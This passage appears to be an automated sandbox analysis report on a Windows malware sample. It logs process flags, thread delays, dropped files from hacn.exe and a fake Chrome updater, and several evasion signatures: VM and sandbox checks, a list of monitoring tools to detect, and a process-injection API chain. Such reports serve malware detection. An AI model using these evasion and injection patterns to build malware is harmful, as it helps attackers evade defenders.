Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\dialer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe	Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,		17_2_00007FF65A1310C0
Source: C:\Windows\System32\dialer.exe	Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,		45_2_00007FF7C6D610C0

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\main.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\dialer.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: main.exe, 00000005.00000002.1756028190.000002441A88E000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: SBIEDLL.DLL
Source: dialer.exe, 00000035.00000003.1789947837.0000014A059D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: dialer.exe, 00000035.00000003.1789947837.0000014A059D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEVWSNNRAZKCWZIKMI

Source: C:\ProgramData\main.exe	Memory allocated: 24417F90000 memory reserve \| memory write watch			Jump to behavior
Source: C:\ProgramData\main.exe	Memory allocated: 24431A70000 memory reserve \| memory write watch			Jump to behavior

Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599665	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599433	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599322	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597976	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597389	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597278	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596113	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595763	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595639	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595420	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595089	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\main.exe	Window / User API: threadDelayed 4323	Jump to behavior
Source: C:\ProgramData\main.exe	Window / User API: threadDelayed 3384	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6247	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2908	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 4235
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 5764
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9905
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3149
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9858
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 1417
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 490

Source: C:\ProgramData\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_bz2.pyd	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\gqxqtdeqxchk.sys	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\select.pyd	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\ProgramData\setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_4-23751

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\hacn.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-16930
Source: C:\Windows\System32\dialer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\ProgramData\main.exe	API coverage: 2.1 %
Source: C:\Windows\System32\winlogon.exe	API coverage: 6.8 %
Source: C:\Windows\System32\lsass.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.7 %

Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7988	Thread sleep count: 4323 > 30	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -599665s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7988	Thread sleep count: 3384 > 30	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -599433s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -599322s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597976s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597389s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597278s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -597062s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -596113s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595763s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595639s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595420s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7984	Thread sleep time: -595089s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7916	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep count: 6247 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep count: 2908 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
